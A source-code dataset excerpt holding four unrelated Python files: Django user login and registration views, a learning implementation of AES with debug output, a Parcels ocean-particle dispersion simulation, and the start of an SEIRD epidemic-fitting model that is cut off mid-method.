|
[
"MIT"
] | null | null | null |
django/www/MeteoGaliciaDB/registros/views.py
|
hugo-lorenzo-mato/Meteo-Galicia-DB
|
3dd52534c16216de5f25cd40877d2facc7cffe24
|
[
"MIT"
] | null | null | null |
django/www/MeteoGaliciaDB/registros/views.py
|
hugo-lorenzo-mato/Meteo-Galicia-DB
|
3dd52534c16216de5f25cd40877d2facc7cffe24
|
[
"MIT"
] | 1
|
2021-04-27T18:37:41.000Z
|
2021-04-27T18:37:41.000Z
|
from django.shortcuts import render
from . import forms
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth import authenticate,login,logout
# Create your views here.
@login_required
def special(request):
return HttpResponse("Estás logueado!")
@login_required
def user_logout(request):
logout(request)
logged = False
return render(request, 'registros/login.html',{'logged':logged})
def registro(request):
registered = False
if request.method == 'POST':
user_form = forms.UserForm(data=request.POST)
profile_form = forms.UserProfileInfo(data=request.POST)
if user_form.is_valid() and profile_form.is_valid():
user = user_form.save()
user.set_password(user.password)
user.save()
profile = profile_form.save(commit=False)
profile.user = user
if 'profile_pic' in request.FILES:
profile.profile_pic = request.FILES['profile_pic']
profile.save()
registered = True
else:
print(user_form.errors,profile_form.errors)
else:
user_form = forms.UserForm()
profile_form = forms.UserProfileInfo()
return render(request,'registros/registration.html', {'registered': registered, 'user_form': user_form,'profile_form':profile_form})
def user_login(request):
logged = False
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username, password=password)
if user:
if user.is_active:
login(request, user)
logged = True
return render(request, 'registros/login.html', {'logged': logged})
else:
return HttpResponse("Cuenta inactiva")
else:
print("Alguien intento loguearse y falló")
return HttpResponse("Datos de acceso inválidos")
else:
return render(request, 'registros/login.html',{'logged':logged})
| 33.151515
| 136
| 0.652194
|
5bb1a299d905125d5884457c9e08858d1b9184c9
| 13,407
|
py
|
Python
|
client_DEBUG_ROUNDS.py
|
Andrew-Wichmann/AESpy
|
0f00dfb814ef65df0a728197baa4fa60eeab7777
|
[
"MIT"
] | null | null | null |
client_DEBUG_ROUNDS.py
|
Andrew-Wichmann/AESpy
|
0f00dfb814ef65df0a728197baa4fa60eeab7777
|
[
"MIT"
] | null | null | null |
client_DEBUG_ROUNDS.py
|
Andrew-Wichmann/AESpy
|
0f00dfb814ef65df0a728197baa4fa60eeab7777
|
[
"MIT"
] | null | null | null |
import sys
import io
from BitVector import *
num_of_rounds=11
#AES modulus
modulus = BitVector( bitstring='100011011' )
#key_bitvector=BitVector(hexstring = "00000000000000000000000000000000")
#key_bitvector=BitVector(hexstring = "0f1571c947d9e8590cb7add6af7f6798")
key_bitvector = BitVector(textstring = "This is my key!!")
rcon=[BitVector(intVal = 1, size = 8), BitVector(intVal = 2,size=8), BitVector(intVal = 4, size=8), BitVector(intVal = 8,size=8), BitVector(intVal=16,size=8), BitVector(intVal = 32,size=8), BitVector(intVal = 64,size=8), BitVector(intVal = 128,size=8), BitVector(intVal = 27,size=8), BitVector(intVal = 54,size=8)]
##Initialize roundkey matrix as empty bitvectors
roundkey = [BitVector(size=128) for _ in range(num_of_rounds)]
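##Key-schedule core: rotate the 32-bit word left one byte (RotWord), run each byte
##through the S-box (SubWord), then XOR the round constant into the leading byte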
def word_substitution(key,roud):
##Make new vector for the return
return_key = BitVector(intVal = key.intValue(), size = 32)
##Shift left one byte
return_key=return_key<<8
i=0
while i<=3:
j=i*8
k=(i+1)*8
##Get byte in integer for table lookup
tempbyte = return_key[j:k]
z = tempbyte.intValue()
##Find substitution in rijndael sbox table
subbyte = sbox[z]
##Make a bitvector out of the sbox result
temp2 = BitVector(intVal=subbyte, size=8)
##Replace the byte
return_key[j:k] = temp2
i=i+1
##Add round constant
return_key[:8]=rcon[roud-1] ^ return_key[:8]
return return_key
def key_expansion():
i=0
##First key is the original key
roundkey[0]=key_bitvector
roud=1
while roud<=(num_of_rounds-1):
##Substitute word
temp = word_substitution(roundkey[roud-1][96:128],roud)
##XOR temp with first word of previous key for word 0
roundkey[roud][:32]= temp ^ roundkey[roud-1][:32]
##XOR the previous word with previous key for word 1-3
roundkey[roud][32:64]=roundkey[roud][:32]^roundkey[roud-1][32:64]
roundkey[roud][64:96]=roundkey[roud][32:64]^roundkey[roud-1][64:96]
roundkey[roud][96:128]=roundkey[roud][64:96]^roundkey[roud-1][96:128]
##Move to the next key
roud=roud+1
def subBytes(state):
if(len(state)!=128):
print "CRITICAL ERROR: State subsitution error in subBytes: vector is incorrect length"
for x in range(16):
j=x*8
k=(x+1)*8
tempbyte = state[j:k]
z = tempbyte.intValue()
##Find substitution in rijndael sbox table
subbyte = sbox[z]
##Make a bitvector out of the sbox result
temp2 = BitVector(intVal=subbyte, size=8)
##Replace the byte
state[j:k] = temp2
return state
def shiftRows(state):
if(len(state)!=128):
print "CRITICAL ERROR: State row shift error in shiftRows: vector is incorrect length"
tempstate = state[:]
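##State bytes are stored column by column (bits [8*k:8*k+8] hold byte k, i.e. column k//4, row k%4);
##ShiftRows leaves row 0 in place and rotates rows 1, 2 and 3 left by 1, 2 and 3 byte positions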
state[8:16] = tempstate[40:48]
state[16:24] = tempstate[80:88]
state[24:32] = tempstate[120:128]
state[40:48] = tempstate[72:80]
state[48:56] = tempstate[112:120]
state[56:64] = tempstate[24:32]
state[72:80] = tempstate[104:112]
state[80:88] = tempstate[16:24]
state[88:96] = tempstate[56:64]
state[104:112] = tempstate[8:16]
state[112:120] = tempstate[48:56]
state[120:128] = tempstate[88:96]
return state
def invShiftRows(state):
if(len(state)!=128):
print "CRITICAL ERROR: State row shift error in shiftRows: vector is incorrect length"
tempstate = state[:]
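##Inverse of shiftRows: rotate rows 1, 2 and 3 right by 1, 2 and 3 byte positions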
state[8:16] = tempstate[104:112]
state[16:24] = tempstate[80:88]
state[24:32] = tempstate[56:64]
state[40:48] = tempstate[8:16]
state[48:56] = tempstate[112:120]
state[56:64] = tempstate[88:96]
state[72:80] = tempstate[40:48]
state[80:88] = tempstate[16:24]
state[88:96] = tempstate[120:128]
state[104:112] = tempstate[72:80]
state[112:120] = tempstate[48:56]
state[120:128] = tempstate[24:32]
return state
def invMixCollumns(state):
if(len(state)!=128):
print "CRITICAL ERROR: State mix collumns error in mixCollumns: vector is incorrect length"
state[:32] = invatrixMultiplication(state[:32])
state[32:64] = invMatrixMultiplication(state[32:64])
state[64:96] = invMatrixMultiplication(state[64:96])
state[96:128] = invMatrixMultiplication(state[96:128])
return state
def invMatrixMultiplication(vector):
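##Multiply one state column by the AES InvMixColumns matrix (rows are rotations of [0E 0B 0D 09]) in GF(2^8)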
stateMatrix=vector[:]
stateMatrix[0:8] = modularMul(vector[0:8],"0E") ^ modularMul(vector[8:16], "0B") ^ modularMul(vector[16:24], "0D") ^ modularMul(vector[24:32], "09")
stateMatrix[8:16] = modularMul(vector[0:8],"09") ^ modularMul(vector[8:16],"0E") ^ modularMul(vector[16:24],"0B") ^ modularMul(vector[24:32],"0D")
stateMatrix[16:24] = modularMul(vector[0:8],"0D") ^ modularMul(vector[8:16],"09") ^ modularMul(vector[16:24],"0E") ^ modularMul(vector[24:32],"0B")
stateMatrix[24:32] = modularMul(vector[0:8],"0B") ^ modularMul(vector[8:16],"0D") ^ modularMul(vector[16:24],"09") ^ modularMul(vector[24:32],"0E")
return stateMatrix
def invSubBytes(state):
if(len(state)!=128):
print "CRITICAL ERROR: State subsitution error in subBytes: vector is incorrect length"
for x in range(16):
j=x*8
k=(x+1)*8
tempbyte = state[j:k]
#print "before",state[j:k].get_bitvector_in_hex()
z = tempbyte.intValue()
##Find substitution in rijndael rsbox table
subbyte = rsbox[z]
##Make a bitvector out of the sbox result
temp2 = BitVector(intVal=subbyte, size=8)
##Replace the byte
state[j:k] = temp2
#print "after:",state[j:k].get_bitvector_in_hex()
#print
return state
def modularMul(byte, hexNum):
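##Multiply `byte` by the constant given as a hex string in GF(2^8), reducing by the AES modulus x^8+x^4+x^3+x+1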
if(type(hexNum)!=str):
print "CRITICAL ERROR: hexnum is not a string"
a = BitVector( hexstring=hexNum)
return a.gf_multiply_modular(byte, modulus, 8)
def matrixMultiplication(vector):
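##Multiply one state column by the AES MixColumns matrix (rows are rotations of [02 03 01 01]) in GF(2^8)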
stateMatrix=vector[:]
stateMatrix[0:8] = modularMul(vector[0:8],"02") ^ modularMul(vector[8:16],"03") ^ vector[16:24] ^ vector[24:32]
stateMatrix[8:16] = vector[0:8] ^ modularMul(vector[8:16],"02") ^ modularMul(vector[16:24],"03") ^ vector[24:32]
stateMatrix[16:24] = vector[0:8] ^ vector[8:16] ^ modularMul(vector[16:24],"02") ^ modularMul(vector[24:32],"03")
stateMatrix[24:32] = modularMul(vector[0:8],"03") ^ vector[8:16] ^ vector[16:24] ^ modularMul(vector[24:32],"02")
return stateMatrix
def mixCollumns(state):
if(len(state)!=128):
print "State mix collumns error in mixCollumns: vector is incorrect length"
state[:32] = matrixMultiplication(state[:32])
state[32:64] = matrixMultiplication(state[32:64])
state[64:96] = matrixMultiplication(state[64:96])
state[96:128] = matrixMultiplication(state[96:128])
return state
def invMixCollumns(state):
if(len(state)!=128):
print "State mix collumns error in mixCollumns: vector is incorrect length"
state[:32] = invMatrixMultiplication(state[:32])
state[32:64] = invMatrixMultiplication(state[32:64])
state[64:96] = invMatrixMultiplication(state[64:96])
state[96:128] = invMatrixMultiplication(state[96:128])
return state
def addRoundKey(roud, state):
return state ^ roundkey[roud]
def encryption(message):
plaintext = BitVector(textstring = message)
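##Pad the plaintext up to a multiple of 128 bits; each pad byte stores the number of pad bytes (PKCS#7-style)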
if((len(plaintext)%128)!=0):
padlen = 128 - (len(plaintext)%128)
for _ in range(padlen/8):
padding = BitVector(intVal=(padlen/8), size=8)
plaintext = plaintext + padding
#print "Padding",plaintext.get_bitvector_in_hex()
stateMatrix = plaintext[:128]
cypher = BitVector(size=0)
block_count = 0
num_of_blocks =len(plaintext)/128
##loop until the message is all 0s
for blockNum in range(num_of_blocks):
block_count = block_count+1
stateMatrix = addRoundKey(0,stateMatrix)
i=1
while(i<num_of_rounds):
print "Encryption Block:", block_count,". Round:",i
stateMatrix = subBytes(stateMatrix)
print "Enc: after subBytes",stateMatrix.get_bitvector_in_hex()
stateMatrix = shiftRows(stateMatrix)
print "Enc: after shiftRows",stateMatrix.get_bitvector_in_hex()
if(i!=num_of_rounds-1):
stateMatrix = mixCollumns(stateMatrix)
print "Enc: after mixCollumns",stateMatrix.get_bitvector_in_hex()
stateMatrix = addRoundKey(i, stateMatrix)
print "Enc: after addRC:",i,stateMatrix.get_bitvector_in_hex()
i=i+1
cypher = cypher+stateMatrix
if(blockNum != (num_of_blocks-1)):
plaintext = plaintext[128:]
stateMatrix = plaintext[:128]
if(len(sys.argv)==3):
print "Block count",block_count
print cypher.get_bitvector_in_hex()
return cypher.get_bitvector_in_ascii()
def decryption(message):
cypher = BitVector(textstring = message)
stateMatrix = cypher[:128]
plaintext = BitVector(size=0)
block_count = 0
num_of_blocks =len(cypher)/128
##loop until the message is all 0s
for blockNum in range(num_of_blocks):
block_count = block_count+1
i=num_of_rounds-1
stateMatrix = addRoundKey(i,stateMatrix)
print "Dec: after addRC",i,stateMatrix.get_bitvector_in_hex()
i=i-1
while(i>=0):
print "Encryption Block:", block_count,". Round:",i
stateMatrix = invShiftRows(stateMatrix)
print "Dec: after InvShiftRows",stateMatrix.get_bitvector_in_hex()
stateMatrix = invSubBytes(stateMatrix)
print "Dec: after InvSubBytes",stateMatrix.get_bitvector_in_hex()
stateMatrix = addRoundKey(i, stateMatrix)
print "Dec: after addRC",i,stateMatrix.get_bitvector_in_hex()
if(i!=0):
stateMatrix = invMixCollumns(stateMatrix)
print "Dec: after mixColl",stateMatrix.get_bitvector_in_hex()
i=i-1
plaintext = plaintext+stateMatrix
if(blockNum != (num_of_blocks-1)):
cypher = cypher[128:]
stateMatrix = cypher[:128]
if(len(sys.argv)==3):
print "Block count",block_count
print plaintext.get_bitvector_in_hex()
return plaintext.get_bitvector_in_ascii()
# Rijndael S-box
sbox = [ 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67,
0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59,
0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7,
0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1,
0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05,
0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83,
0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29,
0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b,
0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa,
0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c,
0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc,
0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec,
0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19,
0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee,
0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49,
0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4,
0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6,
0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70,
0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9,
0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e,
0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1,
0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0,
0x54, 0xbb, 0x16]
# Rijndael Inverted S-box
rsbox = [ 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3,
0x9e, 0x81, 0xf3, 0xd7, 0xfb , 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f,
0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb , 0x54,
0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b,
0x42, 0xfa, 0xc3, 0x4e , 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24,
0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25 , 0x72, 0xf8,
0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d,
0x65, 0xb6, 0x92 , 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda,
0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84 , 0x90, 0xd8, 0xab,
0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3,
0x45, 0x06 , 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1,
0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b , 0x3a, 0x91, 0x11, 0x41,
0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6,
0x73 , 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9,
0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e , 0x47, 0xf1, 0x1a, 0x71, 0x1d,
0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b ,
0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0,
0xfe, 0x78, 0xcd, 0x5a, 0xf4 , 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07,
0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f , 0x60,
0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f,
0x93, 0xc9, 0x9c, 0xef , 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5,
0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61 , 0x17, 0x2b,
0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55,
0x21, 0x0c, 0x7d]
#plaintext = raw_input("Enter your plaintext: ")
#plaintext=plaintext.upper()
#print "Enter your key of size ", len(plaintext), " or less: "
#key = raw_input()
#key = key.upper()
f = open(sys.argv[1])
message = f.read()
key_expansion()
message = encryption(message)
sys.stdout.write(message)
print
message = decryption(message)
sys.stdout.write(message)
print
| 36.531335
| 314
| 0.673007
|
68866faffe4c28071acc722f7eadca5bd37114b7
| 7,815
|
py
|
Python
|
ACC_particle_experiments/scripts_tracer_release/trelease_coarse_Markov1_K15000.py
|
daanreijnders/isoneutral-dispersion
|
88259ba658d15611609f52e1615aff37a54e7289
|
[
"MIT"
] | 1
|
2022-03-18T08:47:41.000Z
|
2022-03-18T08:47:41.000Z
|
ACC_particle_experiments/scripts_tracer_release/trelease_coarse_Markov1_K15000.py
|
daanreijnders/isoneutral-dispersion
|
88259ba658d15611609f52e1615aff37a54e7289
|
[
"MIT"
] | null | null | null |
ACC_particle_experiments/scripts_tracer_release/trelease_coarse_Markov1_K15000.py
|
daanreijnders/isoneutral-dispersion
|
88259ba658d15611609f52e1615aff37a54e7289
|
[
"MIT"
] | 1
|
2022-03-18T08:47:42.000Z
|
2022-03-18T08:47:42.000Z
|
import importlib
import sys
from datetime import timedelta as delta
import numpy as np
import parcels
import xarray as xr
sys.path.append("/nethome/4302001/diffusion-hydro-mod/kernels")
import density_elements_sampled
import Le_Sommer_elements
import EM_3D_BC
import M1_3D_BC
import K_Le_Sommer
import K_Redi_smallslope
import Markov1_3D_BC_taper
import Markov1_3D_BC_taper_init
nparts = 100_000
dt = 40*60 # seconds
Tl = 20*24*60*60
kappa = 15000
nusquared = kappa / Tl
eps = dt/Tl #
eta = 1e-5
# Random seed for reproducibility
parcels.rng.seed(1636)
inpath = "/data/oceanparcels/input_data/MITgcm/ACC_channel/"
refTracer = "ACC_ridge_fine_2y_loca.nc"
dataFile = "ACC_ridge_coarse_1y_locb_fixtemp_with_derivative.nc"
outFile = f"trelease_coarse_locb_Markov1_K{kappa}_Tl{Tl}_p{nparts}_dt{int(dt//60)}m.nc"
outPath = "/scratch/daanr/trajectories/ptracer/"
ds = xr.open_dataset(inpath + dataFile)
ds_ref = xr.open_dataset(inpath + refTracer)
def initializeParticles(reference_ds, level, nparts=50_000):
"""
Initializes particles with a distribution similar to the initial tracer distribution.
`nparts` is an initial approximation; the actual number of particles used depends on the
initial tracer distribution.
Still a work in progress. To change:
- ability to specify (X, Y) center of release
- custom domains, independent from reference dataset
Returns
-------
tuple of 3 arrays
Arrays describing initial X, Y, Z coordinates
"""
nx = 200 # number of gridpoints in x-direction - 1000km/5km
ny = 400 # number of gridpoints in y-direction - 2000km/5km
nz = 30 # number of vertical levels
SALT_3D = np.zeros((nz, ny, nx))
X_release = int(reference_ds.XC[50].data)
Y_release = int(reference_ds.YC[200].data)
XX, YY = np.meshgrid(reference_ds.XC.data, reference_ds.YC.data)
dist_to_release = np.sqrt(np.square(X_release - XX) + np.square(Y_release - YY))
SALT_3D[level, :, :] = np.where(
dist_to_release / 50000 <= 1,
(1 / np.power(2 * np.exp(1), dist_to_release / 50000) - 1 / (2 * np.exp(1)))
/ (1 - 1 / (2 * np.exp(1))),
0,
)
totalTracer = np.sum(SALT_3D[level, :, :])
particlesPerUnitTracer = nparts / totalTracer
particlesPerBin = np.ceil(particlesPerUnitTracer * SALT_3D[level, :, :]).astype("int")
actualNParticles = np.sum(particlesPerBin)
lon = np.array([])
lat = np.array([])
depth = np.ones(actualNParticles) * reference_ds.Z.data[level]
coord_pairs = np.vstack(
(XX[dist_to_release < 50_000], YY[dist_to_release < 50_000])
)
particlesPerBin_masked = particlesPerBin[dist_to_release < 50_000]
# Random initialization of particles in each bin
for idx in range(particlesPerBin_masked.shape[0]):
lon = np.append(
lon,
np.random.uniform(
coord_pairs[0, idx] - 2500,
coord_pairs[0, idx] + 2500,
particlesPerBin_masked[idx],
),
)
lat = np.append(
lat,
np.random.uniform(
coord_pairs[1, idx] - 2500,
coord_pairs[1, idx] + 2500,
particlesPerBin_masked[idx],
),
)
return np.array(lon), np.array(lat), depth
#
plon, plat, pdepth = initializeParticles(ds_ref, 24, nparts=nparts)
ds_ref.close()
def create_fieldset(inpath, dataFile, derivatives= False, Le_Sommer=False):
filenames = {
"U": inpath + dataFile,
"V": inpath + dataFile,
"W": inpath + dataFile,
"THETA": inpath + dataFile,
"boundaryMask": inpath + dataFile,
}
variables = {"U": "UVEL",
"V": "VVEL",
"W": "WVEL",
"THETA": "THETA",
"boundaryMask" : "boundaryMask",
}
dimensions = {
"U": {"lon": "XG", "lat": "YG", "depth": "Zl", "time": "time"},
"V": {"lon": "XG", "lat": "YG", "depth": "Zl", "time": "time"},
"W": {"lon": "XG", "lat": "YG", "depth": "Zl", "time": "time"},
"THETA": {"lon": "XC", "lat": "YC", "depth": "Z", "time": "time"},
"boundaryMask": {"lon": "XC", "lat": "YC", "depth": "Z"},
}
if derivatives == True:
for derivdim in ['X', 'Y', 'Z', 'XX', 'XY', 'XZ', 'YY', 'YZ', 'ZZ']:
filenames[f"dRhod{derivdim}"] = inpath + dataFile
variables[f"dRhod{derivdim}"] = f"dTHETAd{derivdim}"
dimensions[f"dRhod{derivdim}"] = dict(zip(["time", "depth", "lat", "lon"], ds[f"dTHETAd{derivdim}"].dims))
if Le_Sommer == True:
for var in ['Delta', 'P', 'Q', 'R']:
filenames[var] = inpath + dataFile
variables[var] = var.lower()
dimensions[var] = dict(zip(["time", "depth", "lat", "lon"], ds[var.lower()].dims))
for derivdim in ['X', 'Y', 'Z']:
filenames[f"d{var}d{derivdim}"] = inpath + dataFile
variables[f"d{var}d{derivdim}"] = f"d{var.lower()}d{derivdim}"
dimensions[f"d{var}d{derivdim}"] = dict(zip(["time", "depth", "lat", "lon"], ds[f"d{var.lower()}d{derivdim}"].dims))
fieldset = parcels.FieldSet.from_c_grid_dataset(filenames, variables, dimensions, mesh="flat", tracer_interp_method='linear', gridindexingtype='mitgcm', deferred_load=False)
fieldset.add_periodic_halo(zonal=True, meridional=True)
fieldset.add_constant("expansion_terms", 10)
fieldset.add_constant("domain_width", 1_000_000)
fieldset.add_constant("northBound", 2_000_000)
fieldset.add_constant("southBound", 50_000)
fieldset.add_constant("upperBound", -10)
fieldset.add_constant("lowerBound", -3907.58)
fieldset.add_constant("Sc", 0.008)
fieldset.add_constant("Sd", 0.0005)
fieldset.add_constant("TL", Tl)
fieldset.add_constant("nusquared", nusquared)
fieldset.add_constant("epsilon", eps)
fieldset.add_constant("etaval", eta)
return fieldset
fieldset = create_fieldset(inpath, dataFile, derivatives=True, Le_Sommer=False)
class MyParticle(parcels.JITParticle):
pot_temp = parcels.Variable('pot_temp', initial=0)
lon_adjustment = parcels.Variable('lon_adjustment', initial=0)
u_prime = parcels.Variable('u_prime', initial=0)
v_prime = parcels.Variable('v_prime', initial=0)
w_prime = parcels.Variable('w_prime', initial=0)
pset = parcels.ParticleSet.from_list(fieldset=fieldset, pclass=MyParticle, lon=plon, lat=plat, depth=pdepth)
def SampleTHETA(particle, fieldset, time):
particle.pot_temp = fieldset.THETA[time, particle.depth, particle.lat, particle.lon]
SampleTHETAKernel = pset.Kernel(SampleTHETA)
pset.execute(SampleTHETAKernel + \
density_elements_sampled.density_elements_sampled + \
Markov1_3D_BC_taper_init.Markov1_3D_BC_taper_init,
dt=0)
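# Zonal periodic boundary: wrap particle longitude back into [0, domain_width] and keep a
# running offset in lon_adjustment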
def periodicBC(particle, fieldset, time):
if particle.lon < 0:
particle.lon += fieldset.domain_width
particle.lon_adjustment -= fieldset.domain_width
elif particle.lon > fieldset.domain_width:
particle.lon -= fieldset.domain_width
particle.lon_adjustment += fieldset.domain_width
def deleteParticle(particle, fieldset, time):
particle.delete()
output_file = pset.ParticleFile(
name=outPath+outFile, outputdt=delta(hours=24)
)
pset.execute(
pset.Kernel(density_elements_sampled.density_elements_sampled) \
+ pset.Kernel(Markov1_3D_BC_taper.Markov1_3D_BC_taper)
+ pset.Kernel(periodicBC) \
+ SampleTHETAKernel,
runtime=delta(days=180),
dt=delta(seconds=dt),
output_file=output_file,
recovery={parcels.ErrorCode.ErrorInterpolation: deleteParticle,
parcels.ErrorCode.ErrorOutOfBounds: deleteParticle}
)
output_file.close()
| 36.180556
| 177
| 0.642099
|
69accde6c5fc777d0db211af009870b0afd656ff
| 16,400
|
py
|
Python
|
code/sir_model.py
|
oskali/mit_cassandra
|
522460c29a9bfb6fe16ff85775f52d78d5372233
|
[
"MIT"
] | null | null | null |
code/sir_model.py
|
oskali/mit_cassandra
|
522460c29a9bfb6fe16ff85775f52d78d5372233
|
[
"MIT"
] | null | null | null |
code/sir_model.py
|
oskali/mit_cassandra
|
522460c29a9bfb6fe16ff85775f52d78d5372233
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 24 15:01:53 2020
@author: leann, omars
"""
#%% Libraries
import numpy as np
from scipy.integrate import odeint as ode
import pandas as pd
from copy import deepcopy
import scipy.optimize as optimize
from datetime import timedelta
from sklearn.metrics import mean_squared_error
from math import sqrt
from tqdm import tqdm
#%% Helper Functions
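#time-varying transmission rate: smooth logistic-like transition from b1 to b2 centred at time T,
#with steepness controlled by p (for p > 1)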
def mob_func(t, b1, b2, p, T):
x = b2 - b1
y = 1 + (p**(-t + T))
return (x/y) + b1
#ode differential equations
def model(ini, time_step, params):
Y = np.zeros(5) #column vector for the state variables
X = ini
beta1 = params[0]
gamma = params[1]
a = params[3]
mu = params[4]
beta2 = params[5]
p = params[6]
T = params[7]
S = X[0]
E = X[1]
I = X[2]
R = X[3]
D = X[4]
Y[0] = 0 - (mob_func(time_step, beta1, beta2, p, T)*S*I)/params[2] #S
Y[1] = (mob_func(time_step, beta1, beta2, p, T)*S*I)/params[2] - a*E #E
Y[2] = a*E - (gamma + mu)*I #I
Y[3] = gamma*I #R
Y[4] = mu*I #D
return Y
#set up initial compartments
def inifcn(params, cases, deaths):
S0 = params[2] - cases[0] - deaths[0]
E0 = 0.0
I0 = cases[0]
R0 = 0.0
D0 = deaths[0]
X0 = [S0, E0, I0, R0, D0]
return X0
#retrieve cumlative case compartments (active, recovered, dead)
def finfcn(res):
return res[:,2], res[:,3], res[:,4]
#objective function to optimize hyperparameters
def NLL(params, cases, deaths, recover, death_lm, recover_lm, weight_dead, weight_recover, times): #loss function
params = np.abs(params)
cases = np.array(cases)
deaths = np.array(deaths)
res = ode(model, inifcn(params,cases,deaths), times, args =(params,))
active, recovered, dead = finfcn(res)
nll = sqrt(mean_squared_error(cases,active)) + death_lm*sqrt(mean_squared_error(deaths,dead)) + recover_lm*sqrt(mean_squared_error(recover,recovered))
return nll
#%% Model
class SIRModel():
def __init__(self,
nmin=100,
date='date',
region='state',
target='cases',
population='population',
optimizer='Nelder-Mead',
beta1vals = [],
beta2vals = [],
gammavals = [0.01],
avals = [0.0714],#0.142
muvals = [0.001],
pvals = [5],
Tvals = [40, 72],
# beta1vals = [0.01, 0.2, 1],
# beta2vals = [0.05, 2.25, 4.5],
train_valid_split = 0.8,
nmin_train_set = 10,
death_lm = 2,
recover_lm = 2,
verbose = True):
self.nmin = nmin
self.date = date
self.region = region
self.target = target
self.population = population
self.optimizer = optimizer
self.beta1vals = beta1vals
self.beta2vals = beta2vals
self.gammavals = gammavals
self.avals = avals
self.muvals = muvals
self.pvals = pvals
self.Tvals = Tvals
self.nmin_train_set = nmin_train_set
self.train_valid_split = train_valid_split
self.death_lm = death_lm
self.recover_lm = recover_lm
self.verbose = verbose
self.trained_warmstart = None
self.trained_param = None
def fit(self,
df,
retrain_warmstart = False):
dataset = deepcopy(df)
dataset.set_index([self.date])
regions = dataset[self.region].unique()
output = dict()
warmstart = dict()
population_df = dataset.loc[:, [self.region, self.population]]
population = {population_df.iloc[i, 0] : population_df.iloc[i, 1] for i in range(population_df.shape[0])}
for i in range(len(regions)):
region = regions[i]
train_full_set = dataset[[a for a in dataset[self.region] == region]]
train_full_set = train_full_set.sort_values(self.date)
